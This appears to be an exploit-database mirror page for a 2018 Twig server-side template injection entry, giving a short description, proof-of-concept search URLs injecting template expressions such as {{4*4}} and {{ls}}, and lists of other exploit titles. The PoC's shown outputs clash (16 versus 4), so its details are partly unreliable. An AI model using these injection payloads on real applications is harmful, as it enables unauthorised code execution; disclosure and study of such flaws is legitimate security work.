Now you can request a feature, improvement or collaborate with us.

Search for hundreds of thousands of exploits

"Twig < 2.4.4 - Server Side Template Injection"

Author

Exploit author

JameelNabbo

Platform

Exploit platform

php

Release date

Exploit published date

2018-02-16

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
Vulnerability details:
# Exploit Title: Twig <2.4.4 Server side template injection 
# Date: 02/15/2018
# Exploit Author: JameelNabbo
# Author website: www.jameelnabbo.com
# Vendor Homepage: https://twig.symfony.com 
# Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation
# Version: < 2.4.4
# Tested on: MAC OSX

1.Description:
Twig is a modern php template engine  which compile templates down to plain optimized PHP code, Twig <2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values “Normal integer or normal string", depends on the vulnerable application, which takes deferent params by GET or POST.

Example: by injecting this in a search param  http://localhost/search?search_key={{4*4}} <http://localhost/search?search_key=%7B%7B4*4%7D%7D>         Output: 16


2. POC:
http://localhost/search?search_key={{4*4}} 
OUTPUT: 4 

http://localhost/search?search_key={{ls}} 
OUTPUT: list of files/directories etc….
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-15 "Jinja2 2.10 - 'from_string' Server Side Template Injection" webapps python JameelNabbo
2018-02-16 "Twig < 2.4.4 - Server Side Template Injection" webapps php JameelNabbo
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44102/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.